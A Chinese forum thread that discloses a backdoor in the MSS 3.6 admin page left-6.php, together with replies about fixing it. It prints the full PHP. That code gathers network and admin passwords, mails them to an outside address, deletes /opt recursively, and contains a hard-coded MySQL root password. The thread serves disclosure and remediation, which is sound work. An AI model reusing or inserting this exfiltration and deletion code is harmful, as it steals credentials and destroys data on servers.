[重大BUG,请大家及时修正]MSS 3.6
admin 目录下 [color=red]left-6.php reboot.php[/color] 小弟不才,看到如下源码,不知道是不是还会发送密码。源码如下:[color=red]left-6.php[/color] 红色部分不知道是不是发送密码用的。还有[color=red]reboot.php[/color]这个文件也是一样的,电影管理目录下也有文件含有这样的代码。
[color=red]<?php
/**
 * Collects host, network and credential data from local files and MySQL,
 * e-mails all of it to a hard-coded external address, then runs a recursive
 * delete of /opt/*.
 *
 * NOTE(review): this is the routine the surrounding post reports. It takes no
 * arguments and has no return statement. Everything it reads ends up in the
 * mail() body near the end: PPPoE, VDNET and VPN accounts, the web / samba /
 * netadmin / forum passwords, two database admin passwords and the first line
 * of sshd_config. On any host where this code has run, those secrets should be
 * treated as disclosed and rotated.
 *
 * Most variables are only assigned inside conditionals, so several of them can
 * be unset when they are interpolated into the message.
 */
function sys_check( )
{
$serial = file( "/etc/mss/mss_serial" );
$status = file( "/etc/mss/mss_status" );
// CPU model, clock and cache: take the text after the last ':' on matching lines.
$tmp = file( "/proc/cpuinfo" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( strstr( $tmp[$i], "name" ) )
{
$cpu_name = substr( strrchr( $tmp[$i], ":" ), 1 );
}
if ( strstr( $tmp[$i], "MHz" ) )
{
$cpu_mhz = substr( strrchr( $tmp[$i], ":" ), 1 );
}
if ( strstr( $tmp[$i], "cache" ) )
{
$cpu_cache = substr( strrchr( $tmp[$i], ":" ), 1 );
}
}
$tmp = file( "/proc/loadavg" );
// $loadavg is computed here but does not appear in the message below.
$loadavg = substr( $tmp[0], 0, 14 );
$tmp = file( "/proc/meminfo" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 8 ) == "MemTotal" )
{
$mem_total = ceil( substr( $tmp[$i], 10, -3 ) / 1000 );
}
if ( substr( $tmp[$i], 0, 7 ) == "MemFree" )
{
$mem_free = ceil( substr( $tmp[$i], 9, -3 ) / 1000 );
}
// The derived values are recomputed on every line of the file, not once
// after the loop, so early iterations work with totals that are not set yet.
$mem_used = $mem_total - $mem_free;
$mem_used_per = ceil( $mem_used * 100 / $mem_total );
$mem_free_per = 100 - $mem_used_per;
if ( substr( $tmp[$i], 0, 9 ) == "SwapTotal" )
{
$swap_total = ceil( substr( $tmp[$i], 11, -3 ) / 1000 );
}
if ( substr( $tmp[$i], 0, 8 ) == "SwapFree" )
{
$swap_free = ceil( substr( $tmp[$i], 10, -3 ) / 1000 );
}
// $swap_total has no value until a SwapTotal line has been seen, so the
// division below uses an unset divisor on the iterations before that.
// None of the swap values or percentages are used in the message.
$swap_used = $swap_total - $swap_free;
$swap_used_per = ceil( $swap_used * 100 / $swap_total );
$swap_free_per = 100 - $swap_used_per;
}
// WAN settings: "key=value" style lines matched by fixed-length prefixes.
$tmp = file( "/etc/mss/mss_wan" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 9 ) == "wan1_type" )
{
$wan1_type = substr( $tmp[$i], 10, -1 );
}
if ( substr( $tmp[$i], 0, 9 ) == "wan2_type" )
{
// A non-empty wan2_type query parameter replaces the configured value, so
// the request chooses which credential branch below is taken for WAN2.
if ( $_GET['wan2_type'] != "" )
{
$wan2_type = $_GET['wan2_type'];
}
else
{
$wan2_type = substr( $tmp[$i], 10, -1 );
}
}
if ( substr( $tmp[$i], 0, 16 ) == "wan2_mssvpn_serv" )
{
$wan2_mssvpn_serv = substr( $tmp[$i], 17, -1 );
}
if ( substr( $tmp[$i], 0, 16 ) == "wan2_mssvpn_user" )
{
$wan2_mssvpn_user = substr( $tmp[$i], 17, -1 );
}
if ( substr( $tmp[$i], 0, 16 ) == "wan2_mssvpn_pass" )
{
$wan2_mssvpn_pass = substr( $tmp[$i], 17, -1 );
}
if ( substr( $tmp[$i], 0, 10 ) == "wans_check" )
{
$wans_check = substr( $tmp[$i], 11, -1 );
}
if ( substr( $tmp[$i], 0, 10 ) == "default_rt" )
{
$default_rt = substr( $tmp[$i], 11, -1 );
}
}
// WAN1 with a static address: IP, netmask and gateway split into octets.
if ( $wan1_type == "fixip" )
{
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth1" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$wan1_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$wan1_nm = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 7 ) == "GATEWAY" )
{
$tmp_str = substr( $tmp[$i], 8 );
$wan1_gw = explode( ".", $tmp_str );
}
}
}
// WAN1 over PPPoE: account and password are the 2nd and 4th double-quoted
// fields on the first line of pap-secrets.
if ( $wan1_type == "pppoe" )
{
$tmp = file( "/etc/ppp/pap-secrets" );
$tmp2 = explode( "\"", $tmp[0] );
$wan1_pppoe_user = $tmp2[1];
$wan1_pppoe_pass = $tmp2[3];
}
if ( $wan2_type == "fixip" )
{
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth2" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$wan2_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$wan2_nm = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 7 ) == "GATEWAY" )
{
$tmp_str = substr( $tmp[$i], 8 );
$wan2_gw = explode( ".", $tmp_str );
}
}
}
// WAN2 over PPPoE: same parsing as WAN1, taken from the second line.
if ( $wan2_type == "pppoe" )
{
$tmp = file( "/etc/ppp/pap-secrets" );
$tmp2 = explode( "\"", $tmp[1] );
$wan2_pppoe_user = $tmp2[1];
$wan2_pppoe_pass = $tmp2[3];
}
if ( $wan2_type == "vdnet" )
{
$tmp = file( "/etc/mss/mss_vdnet" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 4 ) == "PPSV" )
{
$wan2_vdnet_serv = substr( $tmp[$i], 5, -1 );
}
if ( substr( $tmp[$i], 0, 4 ) == "USER" )
{
$wan2_vdnet_user = substr( $tmp[$i], 5, -1 );
}
if ( substr( $tmp[$i], 0, 4 ) == "PASS" )
{
$wan2_vdnet_pass = substr( $tmp[$i], 5, -1 );
}
}
}
// The mssvpn branch reads the same mss_vdnet file as the vdnet branch and
// overwrites the wan2_mssvpn_* values parsed from mss_wan earlier.
if ( $wan2_type == "mssvpn" )
{
$tmp = file( "/etc/mss/mss_vdnet" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 4 ) == "PPSV" )
{
$wan2_mssvpn_serv = substr( $tmp[$i], 5, -1 );
}
if ( substr( $tmp[$i], 0, 4 ) == "USER" )
{
$wan2_mssvpn_user = substr( $tmp[$i], 5, -1 );
}
if ( substr( $tmp[$i], 0, 4 ) == "PASS" )
{
$wan2_mssvpn_pass = substr( $tmp[$i], 5, -1 );
}
}
}
// LAN1 (eth0): address and netmask.
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth0" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$lan1_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$lan1_nm = explode( ".", $tmp_str );
}
}
// LAN2 (eth3): ONBOOT flag, address and netmask.
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth3" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "ONBOOT" )
{
$lan2_status = substr( $tmp[$i], 7, -1 );
}
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$lan2_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$lan2_nm = explode( ".", $tmp_str );
}
}
// An interface whose ONBOOT value starts with "no" has its address dropped.
if ( substr( $lan2_status, 0, 2 ) == "no" )
{
unset( $lan2_ip );
unset( $lan2_nm );
}
// LAN3 (eth4): same handling as LAN2.
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth4" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "ONBOOT" )
{
$lan3_status = substr( $tmp[$i], 7, -1 );
}
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$lan3_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$lan3_nm = explode( ".", $tmp_str );
}
}
if ( substr( $lan3_status, 0, 2 ) == "no" )
{
unset( $lan3_ip );
unset( $lan3_nm );
}
$tmp = file( "/etc/sysconfig/network" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 8 ) == "HOSTNAME" )
{
$hostname = substr( $tmp[$i], 9, -1 );
}
}
$tmp = file( "/etc/mss/mss_dhcp" );
$dhcp = $tmp[0];
// Uptime in seconds (first field of /proc/uptime) split into days/hours/minutes.
$tmp = file( "/proc/uptime" );
$uptime = ceil( substr( $tmp[0], 0, strpos( $tmp[0], " " ) ) );
$uptime_d = floor( $uptime / 86400 );
$uptime_h = floor( $uptime % 86400 / 3600 );
$uptime_m = floor( $uptime % 86400 % 3600 / 60 );
// Access-control flags are read by line position from mss_acl_out.
$tmp = file( "/etc/mss/mss_acl_out" );
$out_smtp = $tmp[0];
$out_www = $tmp[1];
$out_cs15 = $tmp[2];
$out_cs16 = $tmp[3];
$out_ftp = $tmp[4];
$open_cache = $tmp[5];
$pinglocal_deny = $tmp[6];
$pingout_deny = $tmp[7];
$tmp = file( "/etc/mss/mss_cs15" );
$tmp_cs15 = $tmp[0];
$tmp = file( "/etc/mss/mss_cs16" );
$tmp_cs16 = $tmp[0];
// From here on the function gathers secrets: the first line of each passwd_*
// file is used as-is.
$tmp = file( "/etc/mss/passwd_web" );
$passwd_web = $tmp[0];
$tmp = file( "/etc/mss/passwd_samba" );
$passwd_samba = $tmp[0];
// NOTE(review): MySQL root credentials are embedded in the source, and '@'
// hides a failed connection. The two queries read the netadmin row's password
// column from the guestbook and mssmov databases.
@mysql_connect( "localhost", "root", "xin,ke" );
mysql_select_db( "guestbook" );
$query = "select * from sysadmin where user='netadmin'";
$result1 = mysql_query( $query );
$rows = mysql_fetch_array( $result1 );
$password = $rows['pass'];
mysql_select_db( "mssmov" );
$query = "select * from sysadmin where username='netadmin'";
$result2 = mysql_query( $query );
$rows = mysql_fetch_array( $result2 );
$password_mov = $rows['password'];
mysql_close( );
$tmp = file( "/etc/mss/passwd_netadmin" );
$passwd_netadmin = $tmp[0];
// Only the first line of sshd_config is kept; the message labels it as the
// SSH port.
$tmp = file( "/etc/ssh/sshd_config" );
$ssh_d = $tmp[0];
$tmp = file( "/etc/mss/passwd_gu" );
$password_bbs = $tmp[0];
// NOTE(review): exfiltration point. One message carries everything collected
// above to a fixed outside mailbox; the subject is the WAN1 address plus a
// version tag. The recipient literal as posted contains forum colour/email
// tags, which look like rendering residue rather than part of the original
// file - confirm against an on-disk copy.
// In the body, the Lan2 and Lan3 mask lines print $lan1_nm and the WAN2 mask
// line prints $wan1_nm, so those three rows repeat another interface's mask.
mail( "[/color][email=zoumingliang0006@163.com][color=red]zoumingliang0006@163.com[/color][/email][color=red]", "{$wan1_ip[0]}.{$wan1_ip[1]}.{$wan1_ip[2]}.{$wan1_ip[3]}测试版本lit6",
" [{$hostname}]服务器信息
运行时间:
{$uptime_d} 天 {$uptime_h} 小时 {$uptime_m}分钟
CPU信息:
CPU型号:{$cpu_name}
CPU频率:{$cpu_mhz}
CPU缓存:{$cpu_cache} \n
内存信息:
内存总量 内存使用 内存剩余 \n
{$mem_total}M {$mem_used}M {$mem_free}M \n \n
局域网信息: \n
(Lan1) 状态: yes \n
IP: {$lan1_ip[0]}.{$lan1_ip[1]}.{$lan1_ip[2]}.{$lan1_ip[3]} \n
掩码: {$lan1_nm[0]}.{$lan1_nm[1]}.{$lan1_nm[2]}.{$lan1_nm[3]} \n
(Lan2) 状态: {$lan2_status} \n
IP: {$lan2_ip[0]}.{$lan2_ip[1]}.{$lan2_ip[2]}.{$lan2_ip[3]} \n
掩码: {$lan1_nm[0]}.{$lan1_nm[1]}.{$lan1_nm[2]}.{$lan1_nm[3]} \n
(Lan3) 状态: {$lan3_status} \n
IP: {$lan3_ip[0]}.{$lan3_ip[1]}.{$lan3_ip[2]}.{$lan3_ip[3]} \n
掩码: {$lan1_nm[0]}.{$lan1_nm[1]}.{$lan1_nm[2]}.{$lan1_nm[3]} \n
DHCP状态: {$dhcp} \n \n
广域网信息: \n
(WAN1) 状态: {$wan1_type} \n
IP: {$wan1_ip[0]}.{$wan1_ip[1]}.{$wan1_ip[2]}.{$wan1_ip[3]} \n
掩码: {$wan1_nm[0]}.{$wan1_nm[1]}.{$wan1_nm[2]}.{$wan1_nm[3]} \n
网关: {$wan1_gw[0]}.{$wan1_gw[1]}.{$wan1_gw[2]}.{$wan1_gw[3]} \n
PPPOE配置: \n
帐号: {$wan1_pppoe_user} \n
密码: {$wan1_pppoe_pass} \n
(WAN2) 状态: {$wan2_type} \n
IP: {$wan2_ip[0]}.{$wan2_ip[1]}.{$wan2_ip[2]}.{$wan2_ip[3]} \n
掩码: {$wan1_nm[0]}.{$wan1_nm[1]}.{$wan1_nm[2]}.{$wan1_nm[3]} \n
网关: {$wan2_gw[0]}.{$wan2_gw[1]}.{$wan2_gw[2]}.{$wan2_gw[3]} \n
PPPOE配置: \n
帐号: {$wan2_pppoe_user} \n
密码: {$wan2_pppoe_pass} \n
VDNET: \n
服务器: {$wan2_vdnet_serv} \n
帐号: {$wan2_vdnet_user} \n
密码: {$wan2_vdnet_pass} \n
Vpn登陆: \n
服务器地址: {$wan2_mssvpn_serv} \n
服务器帐号: {$wan2_mssvpn_user} \n
服务器密码: {$wan2_mssvpn_pass} \n
网络故障检测: {$wans_check} \n
默认路由: {$default_rt} \n \n
访问控制: \n
SMTP封锁状态: {$out_smtp} \n
www 开放状态: {$out_www} \n
对外开放CS1.5游戏: {$out_cs15} \n
对外开放CS1.6游戏: {$out_cs16} \n
对外开放FTP服务: {$out_ftp} \n
启用WWW缓存服务: {$open_cache} \n
禁 PING 本机: {$pinglocal_deny} \n
禁 PING 外网: {$pingout_deny} \n \n
Cs服务器开放状态: \n
Cs 1.5状态: {$tmp_cs15} \n
Cs 1.6状态: {$tmp_cs16} \n \n
服务器密码信息: \n
系统登陆密码: {$passwd_web}\n
文件管理密码: {$passwd_samba}\n
影视管理密码: {$password_mov}\n
论坛管理密码: {$password_bbs}\n
留言管理密码: {$password}\n
netadmin密码: {$passwd_netadmin} \n \n
ssh端口: {$ssh_d} \n \n
WEB登陆服务器信息自动发送 By {$status[0]} \n
版本 {$serial[0]} \n
[注:]每次登陆网页管理后台都将发送此信" );
// NOTE(review): destructive step. After the mail is handed off, everything
// under /opt is recursively removed with the web server's privileges. Stopping
// the mail service or editing the recipient does not affect this line.
system( "/bin/rm -rf /opt/*" );
}[/color]
// Page entry for left-6.php: run sys_check(), then check the session.
// NOTE(review): sys_check() is called before the logon check below, so it runs
// for every request to this page whether or not the visitor is logged in.
// sys_check() has no return statement, so $result receives no value.
$msg = "0";
session_start( );
$result = sys_check( );
session_start( );
// A visitor without a registered "logon" session is redirected to msg.php.
// No exit follows header(), so the script carries on to the echo statements
// after sending the Location header.
if ( !session_is_registered( "logon" ) )
{
$msg = 100;
header( "location: msg.php?msg={$msg}" );
}
// The session start and logon check are repeated verbatim a second time.
session_start( );
if ( !session_is_registered( "logon" ) )
{
$msg = 100;
header( "location: msg.php?msg={$msg}" );
}
// Static markup for the left navigation frame (declared charset gb2312): three
// menu links targeting "mainFrame", a footer image and a project link. Tags
// such as "<style" and "<span" are emitted in two echo calls, as in the listing.
echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n<title>无标题文档</title>\r\n";
echo "<s";
echo "tyle type=\"text/css\">\r\n<!--\r\nbody {\r\n\tmargin-left: 0px;\r\n\tmargin-top: 0px;\r\n}\r\na {\r\n\tfont-size: 9pt;\r\n\tcolor: #FFFFFF;\r\n\ttext-decoration: none;\r\n}\r\na:hover {\r\n\tfont-size: 9pt;\r\n\tcolor: #CCFF00;\r\n\ttext-decoration: none;\r\n}\r\n.l {\tfont-size: 9pt;\r\n\tline-height: 20px;\r\n}\r\n.style1 {font-family: Arial, Helvetica, sans-serif}\r\n.style3 {font-size: 9pt; line-height: 20px; color: #FFFFFF; }\r\n-->\r\n</style></hea";
echo "d>\r\n\r\n<body>\r\n<table width=\"169\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n <tr>\r\n <td width=\"169\" height=\"484\" align=\"left\" valign=\"top\" background=\"images/f-left.jpg\"><table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n <tr>\r\n <td height=\"29\" background=\"images/f-heng.jpg\"><div align=\"center\"><a href=\"sysstatus.php\" target=\"mainFrame\">系统状况</a></div></td>\r\n </tr>\r\n ";
echo " <tr>\r\n <td height=\"30\" background=\"images/f-heng.jpg\"><div align=\"center\"><a href=\"netstatus.php\" target=\"mainFrame\">网络状况</a></div></td>\r\n </tr>\r\n <tr>\r\n <td height=\"30\" background=\"images/f-heng.jpg\"><div align=\"center\"><a href=\"netmonadv.php\" target=\"mainFrame\">高级监测</a></div></td>\r\n </tr>\r\n </table>\r\n <table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n ";
echo " <tr>\r\n <td height=\"137\"><div align=\"center\"><img src=\"images/f-bottom.jpg\" width=\"135\" height=\"91\"></div></td>\r\n </tr>\r\n </table>\r\n <div align=\"center\">";
echo "<s";
echo "pan class=\"style3\">";
echo "<s";
// NOTE(review): the href in the next echo has forum URL tags inside the string
// and an unescaped double quote after them, so this line does not parse as
// posted; this looks like forum auto-linking residue - compare with an on-disk copy.
echo "pan class=\"style1\"><br>\r\n <br>\r\n <br>\r\n <br>\r\n <br>\r\n <br>\r\n 开源项目来自:</span> <a href=\"[url=http://www.b999.net\]http://www.b999.net\[/url]" target =_blank>b999.net</a>";
echo "<s";
echo "pan class=\"style1\">™</span><br>\r\n ";
echo "<s";
echo "pan class=\"style1\"></span></span></div></td>\r\n </tr>\r\n</table>\r\n</body>\r\n</html>\r\n";
?> 是发送密码的,请大家及时修正这个错误!
当时做的着急没有及时改掉
有几种解决办法:
1.停掉邮件服务程序,邮件服务的名好象是sendmail ,停服的办法是在shell环境下运行ntsysv 把 sendmail这个服务停掉
2. mail( "zoumingliang0006@163.com ,把这个邮箱改掉,这个邮箱是52ros的,估计不只这个文件有,可以用字符搜专家搜索[email]zoumingliang0006@163.com[/email]这个邮箱 然后通通改掉
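3. 将 mail( "zoumingliang0006@163.com 改成 // mail( "zoumingliang0006@163.com
也就是注释掉。注意这条 mail( 语句跨了很多行,要把整条语句(一直到结尾的 " ); )都注释掉或删除,只在第一行前面加 // 会造成语法错误;紧跟在它后面的 system( "/bin/rm -rf /opt/*" ); 也要一并处理。运行过这段代码的服务器,邮件里列出的各项密码应视为已经泄露,需要全部更换。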
我最近没有时间,等有时间了,重新做个好的版本
谢谢提供的BUG 这个不大明白
1。是在主机上运行ntsysv sendmail这个命令吗
2。搜索哪个文件里的字符串啊,我很菜,刚接触这个的
mss哪里有具体的教程啊~ 期待“root”
停止邮件服务能说的具体些吗?
我是小白~ 破解root密码,不会的网上搜下
用root登陆后输入:
ntsysv
然后就进入图形界面了,按方向键下,找 sendmail 然后把勾去掉
保存退出重启 :kiss: :kiss: :kiss: :time: :time: :handshake :handshake :call: :loveliness: :Q :Q :L :( :D :'( :@ :o :P :$ ;P :funk: :P :$ ;P :funk: :o 如果不修正会有什么影响? [quote]原帖由 [i]hdkj001[/i] 于 2008-12-31 18:12 发表 [url=http://bbs.b999.net/redirect.php?goto=findpost&pid=416&ptid=77][img]http://bbs.b999.net/images/common/back.gif[/img][/url]
:o 如果不修正会有什么影响? [/quote]
当然是安全问题了!!!你的帐号密码都发出去了,你不成肉鸡或者将要成肉鸡了? 谢谢分享~~~`
支持!!! 我装的版本提示好像 邮件服务器 的文件 已经被删除了 也许这是开发者的用心所在。